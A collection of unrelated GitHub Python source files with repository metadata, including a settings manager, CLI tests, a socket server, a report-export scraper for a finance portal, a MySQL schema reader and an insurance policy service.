)[["id", "geo_region", "geo_subregion"]].rename(
columns={"geo_region": "region", "geo_subregion": "subregion"}
)
tracks_charting_only_in_one_subregion = charting_tracks_by_subregion[
~charting_tracks_by_subregion.duplicated(keep=False, subset="id")
].reset_index(drop=True)
subregion_tracks_features = pd.merge(
track_feats, tracks_charting_only_in_one_subregion, on="id"
).set_index("id")
subregion_selection = subregion_tracks_features.copy().loc[
subregion_tracks_features.subregion.isin(
[
"Northern America",
"Latin America and the Caribbean",
"Western Europe",
"Eastern Asia",
]
)
]
subregion_selection.subregion = (
subregion_selection.subregion.cat.remove_unused_categories()
)
subregion_selection.region = (
subregion_selection.region.cat.remove_unused_categories()
)
return subregion_selection
if __name__ == "__main__":
print(get_track_feature_region_dataset())
| Sejmou/exploring-spotify-charts | data-collection-and-exploration/helpers/model.py | model.py | py | 3,256 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "functools.cache",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "pandas.merge",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "functools.cache",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "pandas.merge",
"line_... |
938934612 | import os
import json
class Settings:
def __init__(self, settings_directory, settings_default):
self.settings_directory = settings_directory
self.settings_default = settings_default
self.settings_file = os.path.join(self.settings_directory, "settings.json")
# Make sure a settings file with all expected values exists
self.__add_new_settings()
def __add_new_settings(self):
if not os.path.isdir(self.settings_directory):
os.makedirs(self.settings_directory)
settings = self.get_settings()
for key in self.settings_default:
try:
settings[key]
except KeyError:
self.set_setting(key, self.settings_default[key])
def save(self, settings) -> None:
with open(self.settings_file, "w") as file:
file.write(json.dumps(settings))
file.close()
def set_setting(self, key, value) -> None:
settings = self.get_settings()
settings[key] = value
self.save(settings)
def get_setting(self, setting: str) -> any:
with open(self.settings_file, "r") as file:
settings = json.loads(file.read())
try:
return settings[setting]
except KeyError:
return None
def get_settings(self) -> dict:
if os.path.isfile(self.settings_file):
with open(self.settings_file, "r") as file:
results = json.loads(file.read())
changed = False
if 'ftp_password' in results and results['ftp_password'] and len(results['ftp_password']) < 8:
results['ftp_password'] = self.settings_default['ftp_password']
changed = True
if 'ftp_username' in results and results['ftp_username'] and len(results['ftp_username']) < 5:
results['ftp_username'] = self.settings_default['ftp_username']
changed = True
if changed:
results['enable_ftp_server'] = False
self.save(results)
return results
return {}
| ChimeraOS/chimera | chimera_app/settings.py | settings.py | py | 2,180 | python | en | code | 189 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "os.path.isdir",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": ... |
12487564602 | import filecmp
import subprocess
import pytest
from typer.testing import CliRunner
import erdantic as erd
from erdantic.cli import app, import_object_from_name
import erdantic.examples.dataclasses as examples_dataclasses
import erdantic.examples.pydantic as examples_pydantic
from erdantic.examples.pydantic import Party, Quest
from erdantic.exceptions import ModelOrModuleNotFoundError
from erdantic.version import __version__
runner = CliRunner()
def test_import_object_from_name():
assert import_object_from_name("erdantic.examples.pydantic.Party") is Party
assert import_object_from_name("erdantic.examples.pydantic.Quest") is Quest
assert import_object_from_name("erdantic") is erd
assert import_object_from_name("erdantic.examples.pydantic") is examples_pydantic
with pytest.raises(ModelOrModuleNotFoundError):
import_object_from_name("erdantic.not_a_module")
with pytest.raises(ModelOrModuleNotFoundError):
import_object_from_name("erdantic.examples.pydantic.not_a_model_class")
def test_draw(tmp_path):
# With library for comparison
path_base = tmp_path / "diagram_base.png"
erd.draw(Party, out=path_base)
assert path_base.exists()
# With CLI
path1 = tmp_path / "diagram1.png"
result = runner.invoke(app, ["erdantic.examples.pydantic.Party", "-o", str(path1)])
assert result.exit_code == 0
assert path1.exists()
assert filecmp.cmp(path1, path_base)
# python -m erdantic
path2 = tmp_path / "diagram2.png"
result = subprocess.run(
["python", "-m", "erdantic", "erdantic.examples.pydantic.Party", "-o", str(path2)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
assert result.returncode == 0
assert path2.exists()
assert filecmp.cmp(path2, path_base)
def test_with_terminus(tmp_path):
# With library for comparison
path_base = tmp_path / "diagram_base.png"
erd.draw(Party, out=path_base, termini=[Quest])
assert path_base.exists()
# With CLI
path1 = tmp_path / "diagram1.png"
result = runner.invoke(
app,
[
"erdantic.examples.pydantic.Party",
"-t",
"erdantic.examples.pydantic.Quest",
"-o",
str(path1),
],
)
assert result.exit_code == 0
assert path1.exists()
assert filecmp.cmp(path1, path_base)
def test_with_modules(tmp_path):
# With library for comparison
path_base = tmp_path / "diagram_base.png"
erd.draw(Quest, examples_dataclasses, out=path_base)
assert path_base.exists()
# With CLI
path1 = tmp_path / "diagram1.png"
result = runner.invoke(
app,
[
"erdantic.examples.pydantic.Quest",
"erdantic.examples.dataclasses",
"-o",
str(path1),
],
)
assert result.exit_code == 0
assert path1.exists()
assert filecmp.cmp(path1, path_base)
# With library for comparison, all pydantic classes
path_base_all_pydantic = tmp_path / "diagram_base_all_pydantic.png"
erd.draw(Quest, examples_dataclasses, examples_pydantic, out=path_base_all_pydantic)
assert path_base_all_pydantic.exists()
# With CLI without limit_search_models_to
path2 = tmp_path / "diagram2.png"
result = runner.invoke(
app,
[
"erdantic.examples.pydantic.Quest",
"erdantic.examples.dataclasses",
"erdantic.examples.pydantic",
"-o",
str(path2),
],
)
assert result.exit_code == 0
assert path2.exists()
assert filecmp.cmp(path2, path_base_all_pydantic)
# With CLI with limit_search_models_to
path3 = tmp_path / "diagram3.png"
result = runner.invoke(
app,
[
"erdantic.examples.pydantic.Quest",
"erdantic.examples.dataclasses",
"erdantic.examples.pydantic",
"-o",
str(path3),
"-m",
"dataclasses",
],
)
assert result.exit_code == 0
assert path3.exists()
assert filecmp.cmp(path3, path_base)
def test_missing_out():
result = runner.invoke(app, ["erdantic.examples.pydantic.Party"])
assert result.exit_code == 2
assert "Error" in result.stdout
assert "Missing option '--out' / '-o'." in result.stdout
def test_no_overwrite(tmp_path):
path = tmp_path / "diagram.png"
path.touch()
# With no-overwrite
result = runner.invoke(
app, ["erdantic.examples.pydantic.Quest", "-o", str(path), "--no-overwrite"]
)
assert result.exit_code == 1
assert path.stat().st_size == 0
# Overwrite
result = runner.invoke(app, ["erdantic.examples.pydantic.Quest", "-o", str(path)])
assert result.exit_code == 0
assert path.stat().st_size > 0
def test_dot(tmp_path):
result = runner.invoke(app, ["erdantic.examples.pydantic.Party", "-d"])
assert result.exit_code == 0
assert erd.to_dot(Party).strip() == result.stdout.strip()
path = tmp_path / "diagram.png"
result = runner.invoke(app, ["erdantic.examples.pydantic.Party", "-d", "-o", str(path)])
assert result.exit_code == 0
assert not path.exists() # -o is ignored and no file created
assert erd.to_dot(Party).strip() == result.stdout.strip()
# python -m erdantic
result = subprocess.run(
["python", "-m", "erdantic", "erdantic.examples.pydantic.Party", "-d"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
assert result.returncode == 0
assert not path.exists() # -o is ignored and no file created
assert erd.to_dot(Party).strip() == result.stdout.strip()
def test_help():
"""Test the CLI with --help flag."""
result = runner.invoke(app, ["--help"])
assert result.exit_code == 0
assert (
"Draw entity relationship diagrams (ERDs) for Python data model classes." in result.output
)
def test_version():
"""Test the CLI with --version flag."""
result = runner.invoke(app, ["--version"])
assert result.exit_code == 0
assert result.output.strip() == __version__
| drivendataorg/erdantic | tests/test_cli.py | test_cli.py | py | 6,182 | python | en | code | 205 | github-code | 36 | [
{
"api_name": "typer.testing.CliRunner",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "erdantic.cli.import_object_from_name",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "erdantic.examples.pydantic.Party",
"line_number": 20,
"usage_type": "name"
... |
10208120572 | import socket
import threading
from collections import deque
from concurrent.futures import ThreadPoolExecutor
from jsock.protocol import Protocol
from jsock.message import MessageHeader, Message
from jsock.errors import Errors
from jsock.client import Client
from jsock.config import Config
PORT = 1337
LISTEN_NUM = 50
AWAIT_LIMIT_NUM = 1000
# JacobSocks
#
# Features:
# Multithreading
# Simple
# Customisable
#   Auto documentation for your API
# Error handling
#   Get messages via callbacks or via a (self-made) per-socket await
# Expandable
# How to use:
# Show code
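# Editor's addition -- a hypothetical usage sketch, not part of the original project.
# It wires up the ThreadedServer defined below; the Config constructor arguments are
# assumptions, since only .host, .port and .code_enum_type are referenced in this module.
def _example_usage(config: Config, protocol: Protocol):
    server = ThreadedServer(config, protocol)
    server.set_on_connector(lambda client: print("client connected:", client))
    server.start()  # spawns the accept loop and the message-sorter thread, then returns
    # callback style: server.set_on_message(client, code, handler) reacts to a message code
    # "await" style:  reply = server.await_for_response(client, code) blocks for the answer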
class InvalidProtocol(Exception):
pass
# TODO: make a lib for socket server in python
# TODO: Throw an exception
# TODO: make the config
# TODO: Make the chat server
# TODO: Upload to git and readme
# TODO: Finish the server
# TODO: + add on await failed (disconnected)
# TODO: + delete unuse messages
# TODO: add on-code and per-socket on-code function callbacks (not necessary)
# TODO: + improve message read (first read code and len)
# TODO: make the chat_example docs automatic
# TODO: DEBUG
# TODO: config the server how I like (return format error, auto correct and so on, encryption or not)
# (make the class first)
# TODO: make tls
class ThreadedServer(object):
def __init__(self, config: Config, protocol: Protocol):
self._config = config
self._protocol = protocol
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._sock.bind((self._config.host, self._config.port))
self._input_lock = threading.Lock()
self._input_cv = threading.Condition(self._input_lock)
self._input_queue = deque()
self._input_callback = dict()
self._input_awaits = dict()
self._await_lock = threading.Lock()
self._await_cv = threading.Condition(self._await_lock)
self._on_disconnect_dict = dict()
self._on_connect = None
self._await_socks = dict()
# self.output_lock = threading.Lock()
# self.output_cv = threading.Condition(self.output_lock)
# self.output_queue = deque()
self._output_executor = ThreadPoolExecutor()
self._callbacks_executor = ThreadPoolExecutor()
def start(self):
threading.Thread(target=self._await_start).start()
def _await_start(self):
self._sock.listen(LISTEN_NUM)
threading.Thread(target=self._get_message_listener).start()
while True:
client = Client(*self._sock.accept())
# TODO: need "client.settimeout(120)" ?
if self._on_connect is not None:
self._callbacks_executor.submit(lambda: self._on_connect(client))
threading.Thread(target=self._on_listen_to_client, args=(client,)).start()
@staticmethod
def _send(sock, message):
sock.send(message.to_bytes())
def set_on_disconnect(self, sock, func):
if func is None:
del self._on_disconnect_dict[sock]
else:
self._on_disconnect_dict[sock] = func
def set_on_connector(self, func):
self._on_connect = func
def set_on_message(self, client, code, func):
if func is None:
del self._input_callback[(client, code)]
else:
print(func)
self._input_callback[(client, code)] = func
def send_message(self, client, message):
func = lambda: self._send(client.sock, message)
self._output_executor.submit(func)
# TODO: remove size limit and add dict of requests and not save every message
# TODO: timeout
def await_for_response(self, client, code, timeout=None, config=None):
with self._await_cv:
self._input_awaits[(client, code)] = None
if client not in self._await_socks:
self._await_socks[client] = []
            self._await_socks[client].append(code)
while self._input_awaits[(client, code)] is None:
self._await_cv.wait()
return_value = self._input_awaits[(client, code)]
del self._input_awaits[(client, code)]
self._await_socks[client].remove(code)
if len(self._await_socks[client]) == 0:
del self._await_socks[client]
return return_value
# sorter
def _get_message_listener(self):
while True:
with self._input_cv:
while len(self._input_queue) == 0:
self._input_cv.wait()
while len(self._input_queue) != 0:
client, message = self._input_queue.pop()
# print(f"{client.sock} send: {message}")
# check if someone need the message of there is a callback
func = self._input_callback.get((client, message.code))
have_callback_code = func is not None
if have_callback_code:
self._callbacks_executor.submit(lambda: func(client, message))
else:
with self._await_cv:
if (client, message.code) in self._input_awaits:
self._input_awaits[(client, message.code)] = message
self._await_cv.notify_all()
def _add_to_queue(self, client, message):
with self._input_cv:
self._input_queue.append((client, message))
self._input_cv.notify_all()
# TODO: don't listen to non use code
def _on_listen_to_client(self, client):
while True:
try:
header_data = client.sock.recv(MessageHeader.get_size())
header = MessageHeader.format(header_data, self._config.code_enum_type)
if header.code == Errors.LOCAL_FORMAT_ERROR:
raise InvalidProtocol('Client disconnected')
data = client.sock.recv(header.get_size())
class_type = self._protocol.get_class(header)
if class_type is not None:
message = Message.format(header, class_type.from_json(data.decode()))
self._add_to_queue(client, message)
except InvalidProtocol as e: # TODO: to not kick
print(e)
client.sock.close()
func = self._on_disconnect_dict.get(client)
if func is not None:
self._callbacks_executor.submit(lambda: func(client))
return False
except OSError as e:
print(e)
client.sock.close()
func = self._on_disconnect_dict.get(client)
if func is not None:
self._callbacks_executor.submit(lambda: func(client))
return False
def _on_disconnect(self, client):
with self._await_cv:
if client in self._await_socks:
for code in self._await_socks[client]:
self._input_awaits[(client, code)] = Message.error()
del self._await_socks[client]
self._await_cv.notify_all()
client.sock.close()
func = self._on_disconnect_dict.get(client)
if func is not None:
self._callbacks_executor.submit(lambda: func(client))
| jacobggman/python_black_jack_server | jsock/server.py | server.py | py | 7,368 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "jsock.config.Config",
"line_number": 54,
"usage_type": "name"
},
{
"api_name": "jsock.protocol.Protocol",
"line_number": 54,
"usage_type": "name"
},
{
"api_name": "socket.socket",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "socket.AF_I... |
37989832631 | """
Steps to run:
    python policy_list_report_scraper.py
Program written in Python 3
Program Output:
1 file:
Exported_data.csv - csv file that contains the policy list report data
Program Description:
    Program first fetches the ASP login page parameters - __VIEWSTATE, __VIEWSTATEGENERATOR,
    etc. and then submits these parameters and the login credentials to log in.
Then the program stores cookie info and uses it along with the new page parameters
to access the policy list reports page.
The code then mimics the "Go" POST request with the date parameters (hardcoded)
along with other parameters to get the report details.
    The export POST request is then performed using the new set of form parameters.
The response contains the final exported csv contents which are written to a csv file:
Exported_data.csv
"""
import sys
import requests
from bs4 import BeautifulSoup
import json
# Main Function
def main():
# Login credentials
credentials = dict()
credentials['username'] = 'sample'
credentials['password'] = 'sample'
print("Getting login session parameters to login")
# Home page URL
home_page_url = 'https://secure.financepro.net/financepro/default.aspx?company=deltafinance'
# Storing the session info
session = requests.Session()
response = session.get(home_page_url)
# Parsing the response using Beautiful Soup
soup = BeautifulSoup(response.content, 'html.parser')
# Storing 3 ASP web-page specific form parameters to use to login
viewstate = soup.select('input[name=__VIEWSTATE]')[0]['value']
viewstate_generator = soup.select('input[name=__VIEWSTATEGENERATOR]')[0]['value']
event_validation = soup.select('input[name=__EVENTVALIDATION]')[0]['value']
login_form_parameters = dict()
login_form_parameters['__VIEWSTATE'] = viewstate
login_form_parameters['__VIEWSTATEGENERATOR'] = viewstate_generator
login_form_parameters['__EVENTVALIDATION'] = event_validation
login_form_parameters['tblForm$txtUserName'] = credentials['username']
login_form_parameters['tblForm$txtPassword'] = credentials['password']
login_form_parameters['tblForm$btnLogin'] = 'Log In'
login_form_parameters['tblForm$txtCompanyCode'] = 'deltafinance'
# Storing the cookies post login
response = session.post(home_page_url, login_form_parameters)
cookies = session.cookies.get_dict()
# Logging in
response = requests.post(home_page_url, login_form_parameters)
print("Logged in")
# Hardcoded Policy list data parameters
policy_list_date_params = dict()
policy_list_date_params['Date_Activated_Start_Date'] = '8/1/2009'
policy_list_date_params['Date_Activated_End_Date'] = '8/31/2019'
policy_list_date_params['Date_Change_Status_Start_Date'] = '8/1/2019'
policy_list_date_params['Date_Change_Status_End_Date'] = '8/31/2019'
print("\nPolicy List Dates that will be used:\n")
for key, val in policy_list_date_params.items():
print(key, ":", val)
print("\nAccessing Policy List Report Page")
reports_home_url = 'https://secure.financepro.net/financepro/Reports/ReportsHome.aspx'
policy_list_url = 'https://secure.financepro.net/financepro/Reports/PolicyList.aspx'
response = session.get(policy_list_url, cookies=cookies)
soup = BeautifulSoup(response.content, 'html.parser')
script_tags = soup.find_all("script")
    # Retrieving the form parameters to send in the POST request
    # The 16th script tag contains the JSON form parameters to send in the POST request
parameters = script_tags[15].text
# Retaining only the relevant json form parameters
start_ind = parameters.find("JSON.parse")
end_ind = parameters.find('")', start_ind)
parameters = parameters[start_ind + len("JSON.parse") + 2:end_ind]
parameters = parameters.replace("\\", "")
policy_list_info_params = dict()
    # Getting the ASP accounts web page session parameters
viewstate = soup.select('input[name=__VIEWSTATE]')[0]['value']
viewstate_generator = soup.select('input[name=__VIEWSTATEGENERATOR]')[0]['value']
event_validation = soup.select('input[name=__EVENTVALIDATION]')[0]['value']
print("Parameters retrieved for making to Go POST request")
# Storing paramters to get account details page
policy_list_info_params['__VIEWSTATE'] = viewstate
policy_list_info_params['__VIEWSTATEGENERATOR'] = viewstate_generator
policy_list_info_params['__EVENTVALIDATION'] = event_validation
policy_list_info_params['PolicyDateRange'] = 'rbPolicyActivation'
# The data parameters need to manually changed
policy_list_info_params['DateActivatedFilter$txtStartDate'] = policy_list_date_params['Date_Activated_Start_Date']
policy_list_info_params['DateActivatedFilter$txtEndDate'] = policy_list_date_params['Date_Activated_End_Date']
policy_list_info_params['DateChangeStatusFilter$txtStartDate'] = policy_list_date_params['Date_Change_Status_Start_Date']
policy_list_info_params['DateChangeStatusFilter$txtEndDate'] = policy_list_date_params['Date_Change_Status_End_Date']
policy_list_info_params['ddlAgent$ctlAjaxDropDown$hidSelectedItem'] = parameters
policy_list_info_params['ddlGroupBy'] = 'AgentName, AccountNumber'
policy_list_info_params['btnGo'] = 'Go'
    # Mimicking the POST request triggered by clicking the "Go" button
response = requests.post(policy_list_url, policy_list_info_params, cookies=cookies)
soup = BeautifulSoup(response.content, 'html.parser')
print("Go button POST request sent")
viewstate = soup.select('input[name=__VIEWSTATE]')[0]['value']
viewstate_generator = soup.select('input[name=__VIEWSTATEGENERATOR]')[0]['value']
event_validation = soup.select('input[name=__EVENTVALIDATION]')[0]['value']
policy_list_info_params['__VIEWSTATE'] = viewstate
policy_list_info_params['__VIEWSTATEGENERATOR'] = viewstate_generator
policy_list_info_params['__EVENTVALIDATION'] = event_validation
policy_list_info_params['__EVENTARGUMENT'] = 'EXPORT'
policy_list_info_params['__EVENTTARGET'] = 'Report'
policy_list_info_params.pop('btnGo', None)
print("Parameters retrieved for export csv POST request")
# HTTP POST request to export CSV data
response = requests.post(policy_list_url, policy_list_info_params, cookies=cookies)
soup = BeautifulSoup(response.content, 'html.parser')
# Response contains the exported CSV file
final_csv_output_string = str(soup).strip()
print("\nCSV File contents exported:\n")
print(final_csv_output_string)
final_csv_output_string += "\n"
# Writing the CSV contents to a CSV file
csv_file_name = "Exported_data.csv"
with open(csv_file_name, "w") as csv_file_handler:
csv_file_handler.write(final_csv_output_string)
print("\nCSV contents exported to file:")
print(csv_file_name)
print("\nLogging off")
# Log off page called with cookie info
log_off_url = 'https://secure.financepro.net/financepro/logoff.aspx'
response = requests.get(log_off_url, cookies=cookies)
final_url = 'https://www.deltafinanceoftexas.com/'
response = requests.get(final_url)
# Entry point of code
if __name__ == "__main__":
main()
| tebbythomas/Freelance_Projects | Web_Data_Extraction_Projects/J11_Finance_Pro_Policy_List_Report_Generator/Policy_List_Report/policy_list_report_scraper.py | policy_list_report_scraper.py | py | 7,187 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "requests.Session",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "requests.post",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
... |
26290834166 | """Tests for common_utils.py."""
import common_utils
import pytest
class TestCommonUtils:
def testGetFilePathShouldRaiseError(self):
common_utils.input = lambda _: 'foo'
with pytest.raises(FileNotFoundError):
common_utils.get_file_path()
common_utils.input = input
def testGetFilePathShouldNotRaiseError(self, tmp_path):
directory = tmp_path / 'audio'
directory.mkdir()
file_path = directory / 'test.wav'
file_path.write_text('')
common_utils.input = lambda _: file_path
try:
common_utils.get_file_path()
assert True
except FileNotFoundError as err:
assert False, err
finally:
common_utils.input = input
| thompsond/PyAVMisc | com/AVMisc/common_utils_test.py | common_utils_test.py | py | 687 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "common_utils.input",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "pytest.raises",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "common_utils.get_file_path",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "common... |
477236470 | import io, os
from .comment_parser import CommentParser
from .create_parser import CreateParser
from .insert_parser import InsertParser
class Reader:
def __init__(self):
self._tables = {}
self._rows = {}
self._global_errors = []
self._global_warnings = []
self._parsing_errors = []
self._parsing_warnings = []
self._schema_errors = []
self._schema_warnings = []
self._matched = False
@property
def matched(self):
""" Public getter. Returns whether or not the content was successfully parsed
:returns: Whether or not parsing was successful
:rtype: bool
"""
return self._matched
@property
def parsing_errors(self):
""" Public getter. Returns a list of parsing errors
:returns: A list of parsing errors
:rtype: list
"""
return [] if self._parsing_errors is None else self._parsing_errors
@property
def parsing_warnings(self):
""" Public getter. Returns a list of parsing/table warnings
:returns: A list of parsing/table warnings
:rtype: list
"""
return [] if self._parsing_warnings is None else self._parsing_warnings
@property
def schema_errors(self):
""" Public getter. Returns a list of schema errors
:returns: A list of schema errors
:rtype: list
"""
return [] if self._schema_errors is None else self._schema_errors
@property
def schema_warnings(self):
""" Public getter. Returns a list of schema warnings
:returns: A list of schema warnings
:rtype: list
"""
return [] if self._schema_warnings is None else self._schema_warnings
@property
def global_errors(self):
""" Public getter. Returns a list of schema errors
:returns: A list of schema errors
:rtype: list
"""
return [] if self._global_errors is None else self._global_errors
@property
def global_warnings(self):
""" Public getter. Returns a list of schema warnings
:returns: A list of schema warnings
:rtype: list
"""
return [] if self._global_warnings is None else self._global_warnings
@property
def tables(self):
""" Public getter. Returns a list of table definitions
:returns: A list of table definitions
:rtype: dict[mygrations.formats.mysql.definitions.table]
"""
return self._tables
@property
def rows(self):
""" Public getter. Returns a dictionary containing a lists of rows by table name
:returns: A dictionary containing list of rows by table name
:rtype: {table_name: [mygrations.formats.mysql.defintions.row]}
"""
return self._rows
""" Helper that returns info about the current filename (if present) for error messages
:returns: Part of an error message
:rtype: string
"""
def _filename_notice(self):
if self.filename:
return ' in file %s' % self.filename
return ''
""" Reads the file, if necessary
Reader is a bit more flexible than the other parsers. It can accept a filename,
file-like object, or a string. This method handles that flexibility, taking
the input from the _parse method and extracting the actual contents no matter
what was passed in.
:returns: The data to parse
:rtype: string
"""
def _unpack(self, filename):
# be flexible about what we accept
# file pointer
self.filename = ''
if isinstance(filename, io.IOBase):
contents = filename.read()
# and an actual string
elif isinstance(filename, str):
# which could be a filename
if os.path.isfile(filename):
self.filename = filename
fp = open(filename, 'r')
contents = fp.read()
fp.close()
else:
contents = filename
else:
raise ValueError(
"Unknown type for filename: must be an ascii string, a filename, file pointer, or StringIO"
)
return contents
""" Main parsing loop: attempts to find create, insert, and comments in the SQL string
"""
def parse(self, filename):
data = self._unpack(filename)
# okay then! This is our main parsing loop.
c = 0
while data:
c += 1
if c > 10000:
raise ValueError("Exceeded max parse depth")
# never hurts
data = data.strip()
# now we are looking for one of three things:
# comment, create, insert
if data[:2] == '--' or data[:2] == '/*' or data[0] == '#':
parser = CommentParser()
data = parser.parse(data)
elif data[:6].lower() == 'create':
parser = CreateParser()
data = parser.parse(data)
self._tables[parser.name] = parser
elif data[:6].lower() == 'insert':
parser = InsertParser()
data = parser.parse(data)
if not parser.table in self._rows:
self._rows[parser.table] = []
self._rows[parser.table].append(parser)
else:
if self._global_errors is None:
self._global_errors = []
self._global_errors.append("Unrecognized MySQL command: %s%s" % (data, self._filename_notice()))
return data
self._matched = True
return data
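# Editor's addition: a hypothetical sketch, not part of the package, illustrating the
# input flexibility documented for _unpack -- parse() accepts a plain SQL string, a
# filename, or a file-like object. The CREATE TABLE statement is an arbitrary example.
def _reader_demo():
    reader = Reader()
    reader.parse("CREATE TABLE logs (id INT UNSIGNED NOT NULL, PRIMARY KEY (id));")
    return reader.matched, list(reader.tables.keys())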
| cmancone/mygrations | mygrations/formats/mysql/file_reader/reader.py | reader.py | py | 5,702 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "io.IOBase",
"line_number": 128,
"usage_type": "attribute"
},
{
"api_name": "os.path.isfile",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 135,
"usage_type": "attribute"
},
{
"api_name": "comment_parser.CommentP... |
12234497572 | import datetime
from typing import List
from sqlalchemy.orm import make_transient
from data_access.entities.person import Person
from data_access.entities.policy import Policy
from data_access.entities.policy_offer_template import PolicyOfferTemplate
from data_access.entities.policy_risk import PolicyRisk
from data_access.entities.vehicle import Vehicle
from data_access.repositories.person_repository import PersonRepository
from data_access.repositories.policy_offer_template_repository import PolicyOfferTemplateRepository
from data_access.repositories.policy_repository import PolicyRepository
from data_access.repositories.policy_risk_repository import PolicyRiskRepository
from data_access.repositories.vehicle_repository import VehicleRepository
from services.broker_service import BrokerService
from services.calculation_service import CalculationService
from services.errors import Errors
from services.models.offer_template_creation_model import OfferTemplateCreationModel
from services.models.service_message import ServiceMessage
from services.models.offer_creation_model import OfferCreationModel
class PolicyService:
__person_repository: PersonRepository
__policy_repository: PolicyRepository
__policy_offer_template_repository: PolicyOfferTemplateRepository
__policy_risk_repository: PolicyRiskRepository
__vehicle_repository: VehicleRepository
__broker_service: BrokerService
__calculation_service: CalculationService
def __init__(
self,
policy_repository: PolicyRepository,
broker_service: BrokerService,
policy_offer_template_repository: PolicyOfferTemplateRepository,
vehicle_repository: VehicleRepository,
calculation_service: CalculationService,
policy_risk_repository: PolicyRiskRepository,
person_repository: PersonRepository
):
self.__policy_repository = policy_repository
self.__broker_service = broker_service
self.__policy_offer_template_repository = policy_offer_template_repository
self.__vehicle_repository = vehicle_repository
self.__calculation_service = calculation_service
self.__policy_risk_repository = policy_risk_repository
self.__person_repository = person_repository
def get_by_broker(self, api_key: str, is_offer: bool = False) -> [Policy]:
broker = self.__broker_service.get_by_api_key(api_key)
if broker is None:
return []
return self.__policy_repository.get_by_broker(broker.Id, is_offer)
def get_by_id(self, policy_id: int) -> [Policy]:
return self.__policy_repository.get_by_id(policy_id)
def get_by_vehicle(self, vehicle_id: int):
return self.__policy_repository.get_by_vehicle(vehicle_id)
def get_by_person(self, person_id: int):
return self.__policy_repository.get_by_person(person_id)
def get_by_insurer(self, insurer_id: int, is_summary: bool):
return self.__policy_repository.get_premium_sum_by_insurer(insurer_id)\
if is_summary\
else self.__policy_repository.get_by_insurer(insurer_id)
def create_offer_template(self, offer_template_model: OfferTemplateCreationModel) -> int:
policy_offer_template = PolicyOfferTemplate()
policy_offer_template.Id = self.__policy_offer_template_repository.create_id()
policy_offer_template.Name = offer_template_model.name
policy_offer_template.InsurerId = offer_template_model.insurerId
policy_offer_template.QuotationAlgorithm = offer_template_model.quotationAlgorithm
policy_offer_template.ValidFrom = offer_template_model.validFrom
policy_offer_template.ValidTo = offer_template_model.validTo
self.__policy_offer_template_repository.session().add(policy_offer_template)
self.__policy_offer_template_repository.session().commit()
return policy_offer_template.Id
def create_offer_from_template(self, template_id: int, offer_model: OfferCreationModel, broker_id: int) -> ServiceMessage:
service_message = ServiceMessage()
template = self.__policy_offer_template_repository.get_by_id(template_id)
if template is None:
service_message.errors.append(Errors.NO_POLICY_OFFER_TEMPLATE)
return service_message
vehicle = self.__vehicle_repository.get_by_vin(offer_model.vehicle.vin)
if vehicle is None:
vehicle = Vehicle()
vehicle.Id = self.__vehicle_repository.create_id()
vehicle.Make = offer_model.vehicle.make
vehicle.Model = offer_model.vehicle.model
vehicle.RegistrationNumber = offer_model.vehicle.registrationNumber
vehicle.Vin = offer_model.vehicle.vin
vehicle.ProductionYear = offer_model.vehicle.productionYear
vehicle.RegistrationDate = offer_model.vehicle.registrationDate
vehicle.OwnerCount = offer_model.vehicle.ownerCount
self.__vehicle_repository.session().add(vehicle)
self.__vehicle_repository.session().commit()
person = self.__person_repository.get_by_pesel(offer_model.person.pesel)
if person is None:
person = Person()
person.Id = self.__person_repository.create_id()
person.Name = offer_model.person.name
person.LastName = offer_model.person.lastName
person.BirthDate = offer_model.person.birthDate
person.Pesel = offer_model.person.pesel
person.Email = offer_model.person.email
person.PhoneNumber = offer_model.person.phoneNumber
self.__person_repository.session().add(person)
self.__person_repository.session().commit()
offer = Policy()
offer.Id = self.__policy_repository.create_id()
offer.VehicleId = vehicle.Id
offer.InsurerId = template.InsurerId
offer.BrokerId = broker_id
offer.PersonId = person.Id
offer.CreationDate = datetime.date.today()
offer.IsOffer = True
offer.Version = 1
self.__policy_repository.session().add(offer)
self.__policy_repository.session().commit()
risks = self.calculate_risks(vehicle, template)
for index, risk in enumerate(risks):
risks[index].PolicyId = offer.Id
risks[index].Id = self.__policy_risk_repository.create_id()
self.__policy_risk_repository.session().add(risks[index])
self.__policy_risk_repository.session().commit()
service_message.content = offer.Id
return service_message
def issue_policy(self, offer_id: int) -> ServiceMessage:
service_message = ServiceMessage()
offer = self.__policy_repository.get_by_id(offer_id)
if not offer.IsOffer:
service_message.errors.append(Errors.NO_OFFER_WITH_ID)
else:
risks = offer.PolicyRisks
make_transient(offer)
policy = offer
policy.OfferId = offer.Id
policy.Id = self.__policy_repository.create_id()
policy.IsOffer = False
self.__policy_repository.session().add(policy)
self.__policy_repository.session().commit()
for index, risk in enumerate(risks):
new_risk = PolicyRisk()
new_risk.Id = self.__policy_risk_repository.create_id()
new_risk.PolicyId = policy.Id
new_risk.CurrencyId = risk.CurrencyId
new_risk.RiskId = risk.RiskId
new_risk.CreationDate = datetime.date.today()
new_risk.StartDate = risk.StartDate
new_risk.EndDate = risk.EndDate
new_risk.Premium = risk.Premium
